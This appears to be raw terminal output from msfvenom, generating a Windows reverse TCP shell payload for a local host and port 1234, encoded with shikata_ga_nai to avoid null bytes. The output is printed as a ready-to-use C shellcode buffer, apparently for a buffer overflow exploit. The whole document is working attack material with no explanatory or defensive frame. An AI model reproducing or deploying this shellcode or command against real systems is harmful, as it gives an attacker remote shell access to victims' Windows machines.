msfvenom -p windows/shell_reverse_tcp LHOS=192.168.43.223 LPORT=1234 EXITFUNC=thread -f c  -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] = 


"\xbf\x8d\x4f\x71\xef\xda\xc5\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x52\x31\x7b\x12\x03\x7b\x12\x83\x66\xb3\x93\x1a\x84\xa4\xd6"
"\xe5\x74\x35\xb7\x6c\x91\x04\xf7\x0b\xd2\x37\xc7\x58\xb6\xbb"
"\xac\x0d\x22\x4f\xc0\x99\x45\xf8\x6f\xfc\x68\xf9\xdc\x3c\xeb"
"\x79\x1f\x11\xcb\x40\xd0\x64\x0a\x84\x0d\x84\x5e\x5d\x59\x3b"
"\x4e\xea\x17\x80\xe5\xa0\xb6\x80\x1a\x70\xb8\xa1\x8d\x0a\xe3"
"\x61\x2c\xde\x9f\x2b\x36\x03\xa5\xe2\xcd\xf7\x51\xf5\x07\xc6"
"\x9a\x5a\x66\xe6\x68\xa2\xaf\xc1\x92\xd1\xd9\x31\x2e\xe2\x1e"
"\x4b\xf4\x67\x84\xeb\x7f\xdf\x60\x0d\x53\x86\xe3\x01\x18\xcc"
"\xab\x05\x9f\x01\xc0\x32\x14\xa4\x06\xb3\x6e\x83\x82\x9f\x35"
"\xaa\x93\x45\x9b\xd3\xc3\x25\x44\x76\x88\xc8\x91\x0b\xd3\x84"
"\x56\x26\xeb\x54\xf1\x31\x98\x66\x5e\xea\x36\xcb\x17\x34\xc1"
"\x2c\x02\x80\x5d\xd3\xad\xf1\x74\x10\xf9\xa1\xee\xb1\x82\x29"
"\xee\x3e\x57\xfd\xbe\x90\x08\xbe\x6e\x51\xf9\x56\x64\x5e\x26"
"\x46\x87\xb4\x4f\xed\x72\x5f\xb0\x5a\x57\x40\x58\x99\xa7\x7a"
"\x4b\x14\x41\xe8\x7b\x71\xda\x85\xe2\xd8\x90\x34\xea\xf6\xdd"
"\x77\x60\xf5\x22\x39\x81\x70\x30\xae\x61\xcf\x6a\x79\x7d\xe5"
"\x02\xe5\xec\x62\xd2\x60\x0d\x3d\x85\x25\xe3\x34\x43\xd8\x5a"
"\xef\x71\x21\x3a\xc8\x31\xfe\xff\xd7\xb8\x73\xbb\xf3\xaa\x4d"
"\x44\xb8\x9e\x01\x13\x16\x48\xe4\xcd\xd8\x22\xbe\xa2\xb2\xa2"
"\x47\x89\x04\xb4\x47\xc4\xf2\x58\xf9\xb1\x42\x67\x36\x56\x43"
"\x10\x2a\xc6\xac\xcb\xee\xe6\x4e\xd9\x1a\x8f\xd6\x88\xa6\xd2"
"\xe8\x67\xe4\xea\x6a\x8d\x95\x08\x72\xe4\x90\x55\x34\x15\xe9"
"\xc6\xd1\x19\x5e\xe6\xf3"